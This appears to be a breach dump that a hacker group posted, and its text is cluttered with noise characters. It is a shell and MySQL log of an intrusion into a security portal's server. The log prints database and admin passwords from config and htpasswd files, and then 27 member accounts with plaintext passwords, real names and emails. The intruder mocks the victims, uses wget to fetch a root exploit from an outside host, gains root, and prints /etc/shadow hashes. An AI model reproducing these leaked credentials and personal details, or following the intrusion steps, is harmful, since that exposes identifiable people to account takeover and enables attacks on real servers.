drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..
7 G m; R7 w7 a# h2 t, u7 Sdrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
' k7 ~- [! ] C$ _, a0 sdrwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql4 Q/ H. Y& |# F5 R# M
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com
% `( _" r' @- T9 T9 l. K6 ^( zdrwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend# v( C' o& T+ Z! B! M6 u1 H% o
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
% f& ?" R& U9 G2 r3 U-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
$ r& V/ Q+ _ t3 z3 `4 Xdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config( t6 [. h4 k# z2 r/ _2 i7 y* [: c9 l* C: N
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
D. k6 x! q( M H( Edrwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd6 [! w3 b5 t' }6 O: d
-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php H) R: j4 N; b4 G
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico' }& I! I R* M7 r
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed/ ~6 X a' c9 o B' c2 X s
drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour" L9 L- W( k, V0 L; ]; j# m
-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess
+ Q+ g+ I) [7 {4 j-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess
3 x/ c% W4 y0 E1 D- M9 [. S-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
; `# p* Z1 ^* V1 q3 M @- X5 S |8 u-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html3 I# c; i- h- W7 _. x+ m" S5 c
-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php6 G) o# r# U1 t2 a) X% |; f) }
-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php
$ Y7 f4 w) O& f+ A* C7 C-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf8 }' V1 D% l. w! ~2 T2 T2 z6 j+ t0 y6 X
drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc- |% A0 J4 Q9 f) ?
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
: V: ~5 `7 q, a* kdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
/ Z& E. H- i/ Q( a6 W7 H2 ndrwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
3 K, A# D: B7 \- B! z) edrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
, e9 y4 P5 v' }0 f2 N& Ndrwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
+ I! k; O g/ d* m1 ?drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new6 L+ M2 i/ ^0 r' t! k7 D8 x$ Z5 g
-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf( T2 |$ n/ R6 T/ M: Q' `, K
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re, ]- k$ G- T9 ?! E
-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt! l$ y& V8 B4 c& J" r3 w' W, a
drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
: n: L0 B# l2 r6 s$ Q8 D. @& F5 jdrwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources8 v- ]1 s$ V! ]
drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com8 x- J7 K9 Z2 J9 t" `+ r8 |) P0 f
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes ~ c' X/ P( q r' U0 C
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
5 U* Z& ` x, l8 R$ Kdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl* F( y* B, I5 p8 g4 f2 E
drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
% _, p- @/ _, f. ^drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
% g- p7 ~# `! U-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
7 ^1 s0 i" w! ndrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
. R) K7 _, ]! Q" D) `+ |5 C* u3 n# E+ y& g2 v
sh-3.2$ head -20 index.php
4 B( m8 ^ r7 [+ y# ~<?PHP+ c1 Y4 L3 l' j v/ x7 v" b
/**
5 u; [, |" H4 V$ M: ?, o* Mainfile (external) for astalavistaNET v2.0
c( M$ c1 Z {: V# [- \: B: }*# r2 a5 i" e" q+ l% ]
* @copyright Astalavista IT Engineering GmbH( s" A8 u8 i! T: B5 h1 F3 D
* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
6 b& w. G* f N, R! A# }; L* @version 1.0' W4 u- Y U/ a( B
*/& z w! x8 A8 `0 R4 @( H
" l1 j1 L3 F8 y if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {% x) y6 x! |# e& ^1 T
$dontStartSession = false;
, e' @1 R6 m5 A( A9 U } else {, x9 Q& G C( K' O
$dontStartSession = true;
& J0 D( G( U3 t5 s }( P4 Z9 C& g+ A$ Z' H
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
w9 M" t6 g" U" B require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
8 y' C! k4 }& y' d) j# J' ^2 k require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);9 a( n5 g, n* M s* K1 n4 c
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);2 g& U K' o$ r9 _
9 v* h% C7 w" _
sh-3.2$ cd config
! \0 x' M' A! e3 }- ~% xsh-3.2$ ls -la
. L7 N. f m, ^; P) C0 ototal 32
+ O5 A& |' z2 `/ E) _drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
9 _8 m" ~: o4 \6 E$ ddrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
5 l/ V, y& i4 Y( K3 Y* S+ M/ K-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php7 E- T% H# M7 b/ d7 ]4 J
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php
/ U9 l7 ^8 @; M5 ^+ ~& V1 @-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
6 u" J. c2 J4 A9 o-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
# G; |5 I+ l& y-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php" w' s, a9 ?' a( }9 X
- ^; ~& `9 r, M% [9 p* t @3 Bsh-3.2$ cat com.conf.php
1 I4 x1 m: f- L% i5 y0 I/ s[snip]
! j. z9 |. J6 j//member-database
- M8 Y4 m) V9 A; ]9 k N$_CONFIG['db_mem_server'] = ‘localhost’;1 R2 H" {/ d, }% L/ G6 M
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;6 k1 J7 i6 v# [3 } W+ K4 C/ h. d
$_CONFIG['db_mem_user'] = ‘astanet_db’;2 m" { ], e% d0 S, l
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;2 G& G+ k- t+ l& G+ r+ q
$_CONFIG['db_mem_debug'] = false; //true or false
2 x8 r% N2 I+ p& f+ A1 P* ` ]# }//ads-database
( j- r# \: F: w) k) N( ]% ^$_CONFIG['db_ads_server'] = ‘localhost’;
& k: w1 b/ y* |9 M; C. c& _8 m$ B$_CONFIG['db_ads_database'] = ‘astanet_ads’;( o! e7 E; f' f: A8 I
$_CONFIG['db_ads_user'] = ‘astanet_db’;& W) t8 s" C" y0 _
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;2 q7 J" ~3 I |: t7 b9 }; h
$_CONFIG['db_ads_debug'] = false; //true or false/ P7 o; [; u5 o6 x" i* ]
//rainbow-database
: j' w1 o5 B% w2 D$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;' h8 r: y: k) J
$_CONFIG['db_rainbow_database'] = ‘rainbow’;
W$ Q% r8 Q6 W8 t# Z# `- t$_CONFIG['db_rainbow_user'] = ‘dinu’;. J) E5 s" _% R% ^7 Y$ V
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;3 P% z( N& e8 v4 B
$_CONFIG['db_rainbow_debug'] = false; //true or false
, ^( ~# B6 X8 I) R4 d//mailing lists database1 v0 @" ]. b2 o0 v% p9 ]( U
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;6 z5 W; L4 [/ i3 l1 b, j( V
$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;
+ h4 s5 I- O7 o. ^4 D$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;9 v1 A8 _' ^$ [2 R8 t9 T1 \
$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;7 P8 n: `, M! \' G. f$ S
$_CONFIG['db_mailing_lists_debug'] = false; //true or false
, M! H6 r) d, V& t% G$ i: t//paypal
9 {! U$ \' r; }# H$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;0 ]* t6 [/ \7 \( w y/ t) v
$_CONFIG['sub_pp_cmd'] = ‘_xclick’;: g4 i% R& X0 z6 d' s" @
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
8 B/ |6 f/ O4 f: I9 P) M& ~9 a' q( d$_CONFIG['sub_pp_noship'] = ‘1′;
$ k. _) L) a1 t I# q C* y$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;
8 G6 d1 X! ^% G* I ^& V[snip]4 V. {: T4 V* q; X
- R s i- C8 C) jsh-3.2$ cd ..
; @+ A: o- J9 ^$ B+ l1 Psh-3.2$ cd member2 }/ H! c+ R( Z8 O
sh-3.2$ ls -la0 u+ ]3 V' L' e% }+ ^0 K
total 20
# r0 Q8 h6 P3 m& Q+ ?drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
( m5 v0 [( K1 t2 k8 Ndrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
+ h& n1 q4 _4 I. x-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess
2 ~8 p" C) K" p/ F/ G1 c2 A-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
( Q5 z0 T, V' c+ xsh-3.2$ cat .htaccess, Y- F- d2 R, W/ D/ X( O$ Y
SecFilterEngine off
7 \2 K/ `$ I5 T2 _2 e5 r" L/ R. D. I7 p G# K+ `
sh-3.2$ cd ..% l" k h' `9 ~% D% `% Z5 m
sh-3.2$ cd cron1 e. G4 x- \$ ^+ t2 w1 Z) ?
sh-3.2$ ls -la
5 y- y' U7 Y' u$ e( Dtotal 1681 }! |+ q5 `. U7 L* ?3 k
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
5 t9 r7 C1 ?6 V& ?% f8 o# Hdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
8 Y$ o% ]* n: n4 c: G# ~-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
; t c, c; Y2 z, S' i-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php" {9 x1 ]5 x& g; h
-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php3 U' B( T$ h* u3 Y% O4 s
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php3 ~2 ~5 z( `- s6 x1 Q6 q6 Q
-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php E9 O/ c0 X+ w6 q! e
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php* a6 P r2 k Y4 x
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php& }% F4 H" p, H# t( g
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
0 D+ m d% p+ A: P' ~. H- j% G" z-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
9 c) H) M3 r! G; X-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
+ u5 ?' S$ W% ]" n6 c4 d R# `9 A-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php- B& E9 t# m1 |6 _' o |! ]; d4 h
-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php. c/ D% o! H& J% D
-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
- a9 W/ a$ w2 Y9 [) t) G. z-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
" z: P9 C, X; A- |-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php/ \! g# x0 f: p
-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php7 O, z: H2 v, Q% {; s8 O
-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php& |1 z7 @4 E; \: _
-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php. R: |) _- W7 x8 m
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email' n8 d4 I. a9 T0 F
-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
2 E& l- a5 V2 z; Y' q! e' P-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php+ H$ v9 T" Z$ V; S, ~' Y/ \7 w( D
- h* n3 _: t5 D" T% u6 h
sh-3.2$ cd ..
. r, H$ d6 t# g1 i, Wsh-3.2$ cd _007
9 w! d; m2 F8 X6 s: e. {& [- Ssh-3.2$ ls -la; O9 m/ L: c: l" c9 K
total 24
* p0 x5 p; J! H/ q! Odrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .* I V1 h+ z; O8 n% m$ C8 Y
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
0 j. C6 O0 M$ Z3 d7 l) k5 l" F7 w& T0 E-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
* s" S1 y _$ F( G* y-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php5 O% m! {8 s, Y) ^
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php* v9 l) M6 K$ S/ s: _! \: ?
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap+ } N* M8 t4 {) ~
+ y' k: ~2 }3 n- K! Y. p
sh-3.2$ cat .htaccess
# [6 r7 M6 v2 Z! s* j6 GauthType Basic, {4 v) m- _8 O' Z$ ]) q
authName Admin/ f7 a. w: C" ^& B* ]: k
authUserFile /home/astanet/auth/.htadm_pwd
) K1 U% d' i8 Yrequire valid-user
8 O8 Z9 w/ G4 Z* X) Y, w, u4 h8 V- d+ ]* u0 \1 q+ Q
sh-3.2$ cat /home/astanet/auth/.htadm_pwd; M9 _% N9 R* W
admin2net:CR0bl65MwhfT9 m J: o4 u9 e6 X- K) s. y
4 Y; c& g/ j; u0 \- P, u
sh-3.2$ mysql -u astanet_db -p! w7 @( K3 M7 q. b/ T
Enter password:0 I4 L5 g# k0 ?) c B! t& `- o2 D
Welcome to the MySQL monitor. Commands end with ; or \g.
! M0 R0 G+ g$ |6 }Your MySQL connection id is 275153
/ e+ n/ e. _- x/ zServer version: 5.0.45-community-log MySQL Community Edition (GPL)" X! K( n) ]& Z' x0 h. q
]4 V2 R+ x! |# S1 |% T
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
6 q1 h4 q% _0 L' \) p- @
) a# v" p+ q) z% T) `) {mysql> show databases;
, j9 }# L5 l' I+———————–+1 x4 w" ^% q0 R) I
| Database |! g8 a8 j8 g' p7 d5 r+ E
+———————–+
+ V! l. D9 G) U' L9 q; L| information_schema |
; @+ F8 T! q1 f0 B$ n( V% A' ^, S| astanet_ads |6 o# n4 @5 t2 b2 C* }6 {9 |4 o
| astanet_mailing_lists |
; p: _# @, E T$ O| astanet_mediawiki |
# A0 c8 P) \. @; r$ k% h0 T+ s8 O| astanet_membersystem |2 O# b* W& k# @: J4 \' L- L3 z
| test |
7 q) U& K4 C" K+———————–+
7 E: [. `! u3 b+ @# D$ f7 s) f$ b* x6 rows in set (0.00 sec) K& P# O1 a R$ W Y. q
, L7 P \' ?0 J; `3 |5 Fmysql> use astanet_membersystem7 u$ q/ s1 i' q |$ ?
Database changed
4 e# C7 ]3 ^! h2 D G/ rmysql> show tables;
% H9 C& ^8 ^2 W' s1 T6 T+———————————–+/ \+ o, C% \4 y9 ]
| Tables_in_astanet_membersystem |7 J3 R, O- H; [2 s% Z
+———————————–+
) s3 ~% w" h r8 b* f| blacklist_categories |
" ~0 |' Z( M( b! S% \| blacklist_content |$ L. F! O4 W7 n7 m
| blacklist_levels |; _' d' _* d1 `+ A" b3 o1 j
| blacklist_mcset |
7 X% _: X+ S$ ~! J' r( d! ~| dir_categories |: J# q- z4 E3 c7 g; S+ p; U( H8 I
| dir_comments |# ^' J0 x9 z5 |
| dir_links |* A+ w! \0 M+ n/ R4 k# f
| dir_temp |
4 s, m% ?7 \7 n, E b| dir_votes |
, P& |/ ?. u7 A| documents |
* e2 v6 r7 M: J$ p6 ^9 u4 z| documents_categories |
2 R6 j, x3 f3 _/ ?3 m3 r4 b| email_content |2 P+ H: E3 [+ O
| email_settings |4 N( v8 K3 @. s, f7 n* p
| exploits |
- y5 G" E( C, h| exploits_categories |; {2 _. W M$ u) y
| exploittree_categories |# L2 g6 e( u4 G/ j- `) H5 L( x# {
| exploittree_exploits |
8 m" K& i2 V3 ^7 p$ F0 z8 z| home_values |
$ R8 `) n7 I- Q| iso_countries |, ^% w3 E' Y5 `1 @% {; l% ?5 E m
| links_categories |- x2 O/ o0 z& o0 p$ P9 J z
| links_records |( _9 Z% W6 G! ^2 g
| links_unauth |, A2 ~' y/ r% I+ U6 j
| links_votes |5 y/ T- x' f2 o+ J1 m! a( [; V
| log |' o# b5 u9 j/ c/ \4 v2 y
| news_categories |
& F3 B5 [- n+ X" `, C, L5 g$ ^| news_comments |
4 x; L7 {4 ]$ Q8 `) d| news_emoticons |1 E/ Z2 p9 j+ U9 a% Z' x# ]0 d" a I; e
| news_latest |
, Q" S x. o9 ]5 Z/ l b| news_messages |: s L$ f. ~/ @
| news_statistics |, {5 p6 K- _0 c: s M
| news_votes |) t5 O; {- N7 k ?
| prices_content |
; M0 X2 ]! ?0 o7 q7 b1 V| prices_offers |
4 K' K7 G: z" R3 r9 m| rss_settings |
) ^/ m' `' T3 G, z) o| sessions |+ Y i0 Y% V# T `" I4 g
| stats_signups |
4 c% `8 A5 Z, f: z| u2u2 |, D" R: ~: L$ a
| u2u_contact |
2 p7 X7 F" T) c6 L| u2u_settings |
1 Y- l: T' W% v9 c. b, ~7 A| user_keywords_selected_categories |* T9 N$ {- b( K6 x1 {
| users |
- J0 Y# W3 P" [| users_ipn_test |
7 i1 A/ q8 o _2 A| users_keyword_values |
, z5 T, G0 G8 d) q| users_profile |: m* m5 z. X$ O7 i! s1 C
| users_temp |
7 ]% {3 _2 M& v: E8 |) `+ \2 d* \( y| users_upgrade |1 d+ B* W" @( f
+———————————–+
% f4 X! @& `: o: d8 b$ m/ j46 rows in set (0.00 sec)1 |1 X6 w9 h: R$ ~/ n
' @; n2 }' v5 b! J5 A8 R
mysql> describe users;
0 m3 O0 i/ w4 o3 X* [+————————–+————————————–+——+—–+———————+—————-+' u, O' e! F4 X" v+ j
| Field | Type | Null | Key | Default | Extra |
: o2 ^3 O7 o" k+————————–+————————————–+——+—–+———————+—————-+
. s2 h+ E& k% X/ c% E9 U| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
- e, ~ D6 h+ j( ^1 v0 X4 M. k| user | varchar(50) | NO | | | |
1 x$ L/ R9 e; Q" b: `| nickname | varchar(30) | NO | MUL | anonymous | |" E( N7 i" H0 A" Y: J
| password | varchar(30) | NO | | | |
$ k/ ^, Z: H# @; O i4 j, n| userlevel | tinyint(3) | YES | MUL | NULL | |
1 i8 I) M; |& p, ]# o- k: m| exp | int(8) unsigned | NO | | 0 | |7 H d& {* _1 P, A( j* u
| email | varchar(50) | NO | | | |. a, y* v- r& f4 i
| ip | varchar(15) | NO | | 0 | | h5 |3 n+ o& G
| proxy | set(’0′,’1′) | NO | | 0 | |8 h1 ~ M( j. l& O* {( H
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
9 c$ n- y, |) K$ X0 L0 H, ]2 [| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |# x; ^+ i! ^9 G( F' a( r: M! E* D. K4 f
| anz_in | tinyint(1) | NO | | -1 | |
; A4 {# \, a9 J8 |/ ]+ t| status | tinyint(1) unsigned | NO | | 0 | |5 _* x# [+ p4 ]
| checked | set(’0′,’1′,’2′) | NO | | 0 | |
5 d$ K' f. e; m- T# z& o a# w5 f" G| freemember | set(’0′,’1′) | NO | | 0 | |
( [7 ]" G' L% s* M+ i| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
, c1 {1 }7 M) y- `2 E| lang | tinytext | NO | | | |0 q2 l! c" J+ r4 r, h3 z( L o
| adid | smallint(6) | NO | | 0 | |' P% w% J/ D) T/ U; Y, {
| pp_txn_id | varchar(255) | YES | | NULL | |) T8 w6 J e0 W. m" k
| cnb_transaction_id | varchar(255) | YES | | NULL | |
) X& q$ M" ]* p% u* B% p| cnb_order_id | varchar(255) | YES | | NULL | |
% L0 S# s! z: ^1 d- d0 v| cnb_user_id | int(11) | YES | | 0 | |6 @1 e. o2 X( r- |! D5 p
+————————–+————————————–+——+—–+———————+—————-+
5 n }3 p, F0 t5 i+ P: [22 rows in set (0.01 sec)
6 g, e' b1 ^4 `/ I( ~3 f
4 W) k$ B6 i9 u3 w5 }mysql> select count(*) as skids from users;$ j% A# X: D3 i9 v
+——-+
* f( D' X0 M, b+ v| skids |
/ C1 E* A$ C6 Q/ r& i+——-+
* @" k! u" t) C& l+ T| 25199 |
( S0 m- X+ a M+——-+ O" N6 |; F5 _% \4 C7 d' Y
1 row in set (0.00 sec)7 {. Q3 ^6 y/ j% F+ }
9 e3 [$ f$ g! Q& H; g0 nmysql> select user,nickname,password,email from users where userlevel = 1;
1 l6 ]+ Q# Z! f( b! I: t. M9 F+————————–+———————-+——————+———————————–+
8 ^$ `$ {' Z! T# D4 h; d| user | nickname | password | email |' |/ k1 ]2 c# {* i6 R
+————————–+———————-+——————+———————————–+& j3 L, T7 V5 Y& K: F Y4 i
| pascal | prozac | astaman3 | 链接标记info@astalavista.net |
" [* {! d. m. z: }| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |( A3 z9 E, E# _) r0 p
| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |, s3 Y# f% O* D- Q" K$ ]
| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |
. E9 a0 z8 k* P| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |5 _3 V8 X! C/ `
| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
4 [# S# j2 h: F; f% F) K2 k| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
- r6 L5 x$ I# _3 K| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
' [5 \( a# R6 _, d- R| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |0 i7 ^+ j9 T( j
| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |
4 g" w2 s, |9 y1 d7 u) ?/ n4 ^, L| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |. u# O4 M$ i$ K2 X4 n
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |! H0 k. p# I+ g& |
| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |4 Z$ k9 D3 S% Y* t8 P9 F2 N
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |0 x' n' M( H4 B5 Q
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
7 }$ w. s7 a/ \3 Z' z$ \| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |6 _/ z9 g w) d* O
| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |
+ V9 W1 R D- U| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |
; y) ^! N8 a( V, b) d* f; V| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |' D1 l' N5 @( h) J- R' f# ~
| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |3 E/ Q: m3 @ e
| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |4 L6 r# M1 L5 k
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |
8 y$ B0 b" X0 T$ d5 r9 T| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |% F& N: h, c) R- ~) U
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
, v6 N* K/ E* t' q( c| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |7 h. i2 \! o% s0 k& \9 T) e |
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com | u- ?# Q6 W( W& _
| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |0 d+ T4 {, H* X4 f" G
+————————–+———————-+——————+———————————–+
, Y: {# h2 ?2 d/ D% N9 q( S27 rows in set (0.00 sec)0 {2 E6 T# J' z
$ j j% T6 H9 x# r) vmysql> exit;
* J4 ]) C, |7 P' `5 K0 x( W1 V4 lBye
+ f1 c' G& w; U8 C$ N; J% \- b3 m, w$ |5 H4 O; [9 S
[~] plaintext passwords? yes,
. z4 o# a, ^: }# z" u0 [Those so called “security professionals” who charge you $6.66 / month to# G1 @4 w. u8 `4 X
register at their hack-proof portal, save your passwords in plaintext…
- P6 E4 P C$ R& E3 a) l- r7 X* `+ fbrilliant!' N4 a8 p/ x4 N4 n( f9 U
- S9 F0 }! Y8 s" z- }6 ]
[~] This been fun but we want more.% M$ @: A9 E8 p) D# y6 J
7 i0 D2 _" `( |* L2 t2 D& [( Z+ p' [
sh-3.2$ uname -a5 D0 l3 \. l% |2 A
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
2 T4 _. e- k" t0 G* \& S2 G0 ksh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]
& h9 z" e0 R p/ S, C( r–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
3 Y U n2 p$ GResolving anti.sec.labs… 13.33.33.37
6 a7 R6 S$ H2 FConnecting to anti.sec.labs|13.33.33.37|:80… connected.
; Z% O V n* z' hHTTP request sent, awaiting response… 200 OK1 {! u0 W! {+ S/ B6 f0 E
Length: 18200 (18K) [text/plain]( b) A& j8 ?' N3 d' T" @. G
Saving to: `g0troot’; v3 q& w) j" F- [' b
% _3 q1 s2 R: w! c0 M* F; H
100%[=========================================================================================================================================>] 18,200 58.6K/s in
' d6 q1 R3 B# l& ^0.3s; W. s3 j4 G" k J& X
$ x4 J+ \6 a- j9 v! i6 K# ^% t
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]8 M0 r; l" k4 Q, _) q
" r, m! c, Z; |* m) a
sh-3.2$ ./g0troot -i x86_64# L" R) r* p, L, }* x* z1 i( n
[+] g0troot - anti.sec.labs# u. q* o& N5 \6 d. l
[+] Target: 2.6.18-128.1.10.el5
* `1 f' o9 V1 b! l[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]' o' b2 }+ b* l
- |( I `7 Z! h' M: Q' T[+] r00tr00t$ x& {+ Y3 \& G
[~] Executing shell… U; D0 E3 l, r
. f* j% S* Y( ]7 j* @: t( i
sh-3.2# id6 p. h: y0 m% P" F; N* \
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)& r; @( o T I# u' S1 J& o
X R( l( n- H5 ]
sh-3.2# cat /etc/shadow
3 `& S' O$ |% O+ z( ] sroot 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
( K8 n, _8 S( K4 E[snip]
/ b9 B) i6 W! v7 X& T* Xadmin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
* _; {: \% H: U$ [! e; _jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
$ P7 v {/ d! W' K0 Bcom1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::/ z" T9 T% C# q
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::1 z; h& R$ n4 q6 [; g6 N1 R
( J0 Z6 ~9 J# v: [6 G5 f
